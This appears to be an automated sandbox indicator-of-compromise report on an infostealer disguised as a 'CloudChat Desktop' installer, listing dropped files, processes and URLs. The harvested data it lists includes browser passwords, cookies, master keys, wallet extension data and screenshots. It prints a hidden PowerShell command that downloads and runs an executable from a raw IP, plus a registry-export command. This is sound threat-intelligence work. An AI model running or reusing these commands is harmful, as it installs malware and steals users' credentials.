IOC Report
LIccs3x2LZ.exe

Files

File Path
Type
Category
Malicious
LIccs3x2LZ.exe
PE32+ executable (console) x86-64, for MS Windows
initial sample
C:\Users\user\AppData\Local\Temp\_MEI71322\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_ARC4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_chacha20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_pkcs1_decode.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_arc2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_blowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cast.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_des.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_des3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_BLAKE2b.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_RIPEMD160.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA224.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA384.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_SHA512.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_keccak.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Hash\_poly1305.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Math\_modexp.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ec_ws.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ed25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_ed448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\PublicKey\_x25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\Crypto\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\VCRUNTIME140_1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\python38.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\pywin32_system32\pywintypes38.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71322\win32\win32crypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\Updater.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\dbghelp.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-7GS9C.tmp
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-BG1K1.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-CGK3C.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-TSCLB.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Chrome_cookies.json
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Chrome_passwords.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Local Storage\leveldb\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Default\Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\Local State
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Chrome\MasterKey
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Cookies
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\History
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\CURRENT
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\LOG.old
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Local Storage\leveldb\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Default\Login Data
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Edge_passwords.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\Local State
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\Edge\MasterKey
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\addons.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\cookies.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\key4.db
SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\permissions.sqlite
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, file counter 3, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\FireFox\v6zchhhv.default-release\places.sqlite
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_books.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_history.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\IE\IE_passwords.txt
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\Credentials.json
Unicode text, UTF-8 (with BOM) text, with very long lines (13580), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\DNSCache.json
Unicode text, UTF-8 (with BOM) text, with very long lines (1498), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\IP.json
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\InstalledApp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\Process.json
Unicode text, UTF-8 (with BOM) text, with very long lines (48002), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\ScreenShot0.jpg
JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\SystemInfo.json
Unicode text, UTF-8 (with BOM) text, with very long lines (5423), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserFiles.json
Unicode text, UTF-8 (with BOM) text, with very long lines (2058), with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserSOFTWARE.reg
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UsersInfo.json
Unicode text, UTF-8 (with BOM) text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\REG7885.tmp
Windows Registry little-endian text (Win2K or above)
dropped
C:\Users\user\AppData\Local\Temp\_MEI71322\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI71322\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r0s4m5y5.5km.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulbepvej.vef.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\is-L4TEK.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\tmp6E83.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp6FEB.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp727D.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Temp\tmp72BC.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\tmp730B.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp731C.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Temp\tmp733C.tmp
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\Users\user\AppData\Local\Temp\tmp74E3.tmp
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\Updater.dat (copy)
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\D877F783D5D3EF8C\map0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\F52BD5F9617612C60
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_2
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_3
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_18_4
DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, minimum point enabled, calibration: offset 0.000000, slope 0.003786
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_1
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_2
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_3
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\emoji\cache_24_4
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\settings0
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\settings1
data
modified
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\shortcuts-custom.json
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\shortcuts-default.json
ASCII text
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\cdata\usertag
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\is-8PQGO.tmp
data
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\log.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\log_start0.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\CloudChat Desktop\unins000.dat
InnoSetup Log CloudChat Desktop {53F49750-6666-4FBF-9CA8-7A333C87D1ED}, version 0x418, 5773 bytes, 632922\37\user\37, C:\Users\user\AppData\Roaming\CloudChat
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CloudChat Desktop\CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:26 2024, mtime=Mon Sep 30 09:20:28 2024, atime=Fri Jun 24 01:27:42 2022, length=51122176, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CloudChat Desktop\Uninstall CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:25 2024, mtime=Mon Sep 30 09:20:25 2024, atime=Mon Sep 30 09:20:09 2024, length=3416125, window=hide
dropped
C:\Users\user\Desktop\CloudChat.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Sep 30 09:20:26 2024, mtime=Mon Sep 30 09:20:30 2024, atime=Fri Jun 24 01:27:42 2022, length=51122176, window=hide
dropped

Processes

Path | Cmdline | Malicious
C:\Users\user\Desktop\LIccs3x2LZ.exe | "C:\Users\user\Desktop\LIccs3x2LZ.exe" | malicious
C:\Users\user\Desktop\LIccs3x2LZ.exe | "C:\Users\user\Desktop\LIccs3x2LZ.exe" | malicious
C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe | "C:\Users\user\AppData\Roaming\CloudChat Desktop\CloudChat.exe" | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -WindowStyle Hidden -Command "$machineName = $env:COMPUTERNAME; $path = Join-Path -Path $env:TEMP -ChildPath 'GUIDGUIDGUID.exe'; $uri = 'http://185.196.10.235:50001/download?name=' + $machineName; Invoke-WebRequest -Uri $uri -OutFile $path; Start-process $path" | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c "start cmd.exe /K C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe" |
C:\Windows\System32\cmd.exe | cmd.exe /K C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe | C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe |
C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp | "C:\Users\user\AppData\Local\Temp\is-4QOV2.tmp\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.tmp" /SL5="$4046E,22570383,901632,C:\Users\user\Desktop\84a15bc948acf97f686e27b33874e08bd04d6ce22b9112c4f7d4432850b6e24f.exe" |
C:\Windows\SysWOW64\reg.exe | "reg" EXPORT "HKEY_CURRENT_USER\SOFTWARE" "C:\Users\user\AppData\Local\Temp\9144b88e-958d-4c3c-90ee-8a3bd5e186d3\System\UserSOFTWARE.reg" /y |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |

URLs

Name
IP
Malicious
http://185.196.10.235:50001/download?name=
unknown
malicious
http://185.196.10.235:50001/download?name=user-PC
185.196.10.235
malicious
